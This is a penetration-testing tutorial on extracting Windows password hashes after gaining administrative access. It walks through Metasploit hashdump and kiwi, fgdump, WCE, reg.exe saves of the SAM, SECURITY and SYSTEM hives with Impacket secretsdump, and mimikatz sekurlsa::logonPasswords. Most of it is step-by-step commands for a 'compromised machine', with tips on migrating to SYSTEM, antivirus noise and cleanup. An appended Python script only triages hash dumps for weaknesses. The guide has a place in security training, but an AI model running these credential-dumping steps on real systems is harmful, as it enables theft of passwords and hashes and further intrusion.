This page demonstrates different techniques to extract the password hashes of Windows users. All of them need administrative privileges on the target, and most need SYSTEM.

Metasploit

Hashdump

With a Meterpreter session on the target, sysinfo shows the OS version and architecture (so you know whether the Meterpreter matches the OS bitness), and hashdump reads the LM/NT hashes of all local accounts from the SAM. It returns hashes, not passwords: they still have to be cracked or passed. hashdump needs SYSTEM privileges, so run it from an elevated session or after migrating.

  • sysinfo
  • hashdump

Load Mimikatz (kiwi) in Meterpreter

  • load kiwi
  • help kiwi

This time we use creds_all, which makes kiwi retrieve every credential it can parse from LSASS memory for the current logon sessions: NTLM hashes (msv), Kerberos keys and tickets and, where WDigest caching is enabled, plaintext passwords. Kiwi needs SYSTEM privileges and must run from a Meterpreter whose architecture matches the OS (an x86 session on 64-bit Windows cannot read LSASS correctly).

post/windows/gather/hashdump

This module dumps the local user accounts from the SAM database by reading the registry (it needs SYSTEM)

  • use post/windows/gather/hashdump
  • sessions -l
  • show info
  • set session 1
  • run

If the module returns "Access is denied", the session is not running as SYSTEM. Migrate the Meterpreter into a process owned by "NT AUTHORITY\SYSTEM" (winlogon.exe is a common choice), background the session and run the module again:

  • sessions -l
  • sessions -i 1
  • ps
  • migrate <PID>
  • background
  • run

post/windows/gather/smart_hashdump

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

  • use post/windows/gather/smart_hashdump
  • show info
  • set session 1
  • run

post/windows/gather/credentials/credential_collector

This module harvests credentials found on the host (password hashes and access tokens) and stores them in Metasploit's database, where the creds command lists them afterwards.

  • use post/windows/gather/credentials/credential_collector
  • show info
  • set session 1
  • run

fgdump

A tool for mass password auditing of Windows systems (https://www.aldeid.com/wiki/FGDump)

Syntax

  • fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]

Options

  • -? = displays help (you’re looking at it!)
  • -t = will test for the presence of antivirus without actually running the password dumps
  • -c = skips the cache dump
  • -w = skips the password dump
  • -s = performs the protected storage dump
  • -r = forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
  • -v = makes output more verbose. Use twice for greater effect
  • -k = keeps the pwdump/cachedump going even if antivirus is in an unknown state
  • -l = logs all output to logfile
  • -T = runs fgdump with the specified number of parallel threads
  • -h = is the name of the single host to perform the dumps against
  • -f = reads hosts from a line-separated file
  • -H = reads host:username:password from a line-separated file (per-host credentials)
  • -o = skips pwdump history dumps
  • -a = will not attempt to detect or stop antivirus, even if it is present

How to

1. Transfer it to the compromised machine using your preferred method. Here the Meterpreter "upload" command was used.

  • upload fgdump.exe

2. Drop into a command shell and copy the binary into its own working directory, for example under %temp%, so the dump files it writes are easy to find and to remove afterwards

  • shell
  • mkdir %temp%\results
  • copy fgdump.exe %temp%\results
  • cd %temp%\results
  • dir

3. Run the application. With no host given it dumps the local machine, and after a few seconds a file named after the host, "127.0.0.1.pwdump", appears (plus a "127.0.0.1.cachedump" if cached domain logons exist). Note that fgdump tries to detect and stop antivirus before dumping, and is itself flagged by nearly every AV product, so it is noisy on a monitored host.

  • fgdump.exe
  • dir

4. Read the file with the more command. Each line has the pwdump format user:RID:LM hash:NT hash:::

  • more 127.0.0.1.pwdump

Windows Credentials Editor (WCE)

Windows Credentials Editor (WCE) is a post-exploitation security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

WCE can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon.

WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8.

WCE works either by DLL injection or by directly reading the Local Security Authority Subsystem (LSASS) process memory. The second method is safer in terms of operating system stability, because no code is injected into a highly privileged process.

Download it from https://www.ampliasecurity.com/research/windows-credentials-editor/

1. With a session running as administrator or SYSTEM, transfer the tool to the target

2. Once the file is on the target, execute it to extract the hashes of the current logon sessions; like fgdump, the binary is detected by most antivirus products

Dump hives from Registry and Impacket

1. Save a copy of the SYSTEM, SECURITY and SAM hives (reg.exe save needs administrative privileges; it does not touch LSASS, which makes it the safest option on production hosts) and download them to your local system

  • reg.exe save hklm\sam c:\windows\temp\sam.save
  • reg.exe save hklm\security c:\windows\temp\security.save
  • reg.exe save hklm\system c:\windows\temp\system.save

2. Once the files are generated, transfer them to your Kali/Parrot machine. This time Meterpreter was used to download the files (any other method works)

  • cd C:\Windows\temp
  • download c:\windows\temp\sam.save
  • download c:\windows\temp\security.save
  • download c:\windows\temp\system.save

Using Impacket to extract the content of these files

1. Install Impacket on your Linux machine (on Kali it is already packaged, and the script is available as impacket-secretsdump)

  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip3 install -r requirements.txt
  • pip3 install .
  • cd examples
  • python3 secretsdump.py -h

2. Point secretsdump.py at the downloaded hives. The LOCAL keyword tells it to parse the files offline instead of connecting to a remote target

  • python3 secretsdump.py -sam ~/Desktop/sam.save -security ~/Desktop/security.save -system ~/Desktop/system.save LOCAL

The SYSTEM hive is mandatory: it holds the boot key that decrypts the other two. SAM + SYSTEM yields the local accounts' LM/NT hashes in pwdump format; SECURITY + SYSTEM additionally yields the LSA secrets (service account passwords, the machine account password, DPAPI keys) and the cached domain logon hashes (DCC2) of domain users who have logged on to the host. Delete the .save files from the target when done.
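The fgdump output file above and the local SAM section of secretsdump.py output share the pwdump line format user:RID:LM hash:NT hash:::. The following Python script is an added example and is not part of the original page, of fgdump or of Impacket: it parses such output, skips banner, DCC2 and LSA-secret lines, and flags what a tester or a defender checks first: accounts that still have an LM hash (the password is at most 14 characters and trivially crackable), accounts with the blank NT hash (empty password, or a disabled built-in such as Guest) and accounts sharing one NT hash (password reuse). The sample dump, its account names and its hash values are constructed for the example, modelled on secretsdump.py output.

```python
"""Triage pwdump-format hash dumps (fgdump .pwdump files, secretsdump.py SAM section)."""
import re
from collections import defaultdict

# Well-known values: LM field of an account with no LM hash, NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:rid:lmhash:nthash:::  (anything else, e.g. secretsdump banners, DCC2 or LSA secret
# lines, simply does not match and is skipped)
PWDUMP_LINE = re.compile(r"^([^:\s]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")

# Constructed sample, modelled on secretsdump.py output; accounts and hashes are illustrative.
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x0123456789abcdef0123456789abcdef
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/jdoe:$DCC2$10240#jdoe#0123456789abcdef0123456789abcdef
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef
[*] Cleaning up...
"""


def parse_pwdump(text):
    """Return [{'user', 'rid', 'lm', 'nt'}, ...] for every pwdump-format line in text."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def triage(entries):
    """Flag LM hashes, blank NT hashes and NT hashes shared by several accounts."""
    by_nt = defaultdict(list)
    findings = {"lm_present": [], "blank_nt": [], "shared_nt": {}}
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings["lm_present"].append(e["user"])   # LM storage still enabled: weak
        if e["nt"] == EMPTY_NT:
            findings["blank_nt"].append(e["user"])     # empty password, or a disabled built-in
        else:
            by_nt[e["nt"]].append(e["user"])
    findings["shared_nt"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return findings


def hashcat_lines(entries):
    """user:nthash lines for `hashcat -m 1000 --username`; blank hashes are left out."""
    return [f"{e['user']}:{e['nt']}" for e in entries if e["nt"] != EMPTY_NT]


if __name__ == "__main__":
    parsed = parse_pwdump(SAMPLE_DUMP)
    for name, value in triage(parsed).items():
        print(f"{name}: {value}")
    print("\n".join(hashcat_lines(parsed)))
```

Feed it a real file with parse_pwdump(open("127.0.0.1.pwdump").read()) or the saved stdout of secretsdump.py; the regex ignores every line that is not a hash line, so both work unchanged.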

In-memory technique

The concept behind in-memory dump of SAM hashes is to inject a DLL into the LSASS system process or, generally speaking, parsing the memory for specific patterns and inspecting these memory pages’ content. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process, therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required.

The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. Although, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and the gsecdump from TrueSec. Both work on 32-bit and 64-bit systems across all versions of Windows. Although, the former cannot successfully dump users’ password hashes on domain controllers as it reads the SAM hashes from the registry rather than injecting into LSASS process. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin.

The two paragraphs above are quoted from https://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html

Mimikatz

Mimikatz is the reference tool for extracting Windows credentials; here we only use it to dump hashes, a small part of what it can do.

1. First transfer the tool to the victim machine using your preferred method. This time the Meterpreter "upload" command was used to store the file in %temp%. Kali ships the binaries under /usr/share/windows-resources/mimikatz; pick the Win32 or x64 build matching the target's architecture.

  • upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe

2. Now change to the directory where you stored the file, drop into a command shell and start mimikatz

  • cd %temp%
  • pwd
  • shell
  • mimikatz.exe

3. First obtain the privileges mimikatz needs: privilege::debug enables SeDebugPrivilege (required to read LSASS memory) and token::elevate impersonates a SYSTEM token (required for lsadump::sam to read the SAM)

  • privilege::debug
  • token::elevate

4. Dump the credentials of every logon session held in LSASS memory: NTLM hashes, Kerberos keys and, where WDigest caching is enabled, plaintext passwords. This fails on hosts with LSA Protection (RunAsPPL) or Credential Guard enabled, and the executable itself is flagged by virtually every antivirus product

  • sekurlsa::logonPasswords

5. Alternatively, dump the local accounts' NT hashes directly from the SAM in the registry, which does not touch LSASS memory

  • lsadump::sam